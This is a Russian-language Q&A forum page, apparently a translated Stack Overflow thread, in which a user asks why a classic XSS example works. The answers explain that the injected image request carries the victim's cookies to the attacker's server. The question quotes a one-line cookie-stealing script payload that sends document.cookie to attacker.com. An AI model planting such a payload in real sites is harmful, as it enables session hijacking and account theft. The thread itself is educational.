Вопрос о типе атаки XSS - PullRequest
       34

Вопрос о типе атаки XSS

1 голос
/ 12 апреля 2010

Цитируется по http://xss -proxy.sourceforge.net / Advanced_XSS_Control.txt :


Как многие здесь, вероятно, знают, текущие атаки XSS обычно бывают двух видов: 1. Атакующий загружает теги на общедоступную доску объявлений, в блог или на другой сайт, который имеет уязвимость XSS, которую посетят многие другие пользователи. Атакующий нормально собирает файлы cookie сайта для последующей олицетворения пользователя, но форма отправляет и другие атаки иногда используются. Это то, о чем я думаю, многие XSS. Вот пример:

Кто-то разместит на evilblog.com следующее, что другие пользователи обработают

<script>document.write("<img src=http://attacker.com/” + document.cookie + “>”)</script>

Это попыталось бы получить изображение с сервера злоумышленника с помощью evilblog пользователя. куки в URL.


Мой вопрос:

Я не понимаю цель / результат URL-адреса изображения , написанного выше. Кто-нибудь может подробнее рассказать об этом?

PS: Что это значит для «Это попытается получить изображение с сервера злоумышленника с помощью cookie-файлов пользователя evilblog в URL»

Ответы [ 3 ]

2 голосов
/ 12 апреля 2010

document.write () просто добавляет img-тэг на сайт, и браузер попытается загрузить изображение с этого URL.

Сценарии и фреймы иногда блокируются, когда они поступают из другого домена, поэтому в этом случае атака XSS будет неудачной. Изображения обычно разрешены, так как многие сайты в любом случае отображают изображения с другого хоста, поэтому атака XSS будет успешной.

Результатом является запись в журнале злоумышленников, которая содержит информацию о файлах cookie и, поскольку она обычно ничего не возвращает, она интерпретируется как испорченное изображение, поэтому большинство браузеров ничего не отображают, а пользователи ничего не подозревают.

1 голос
/ 12 апреля 2010

Simple. Он инициирует запрос к враждебному домену, который содержит cookie в URL запроса.

1 голос
/ 12 апреля 2010

Цель состоит в том, чтобы изображение автоматически извлекалось браузером; в этом примере сведения о cookie-файлах задаются в строке запроса по этому URL-адресу, поэтому злоумышленник получает URL-адрес, получает cookie-файл и, следовательно, получает данные, необходимые для аутентификации.

Добро пожаловать на сайт PullRequest, где вы можете задавать вопросы и получать ответы от других членов сообщества.
...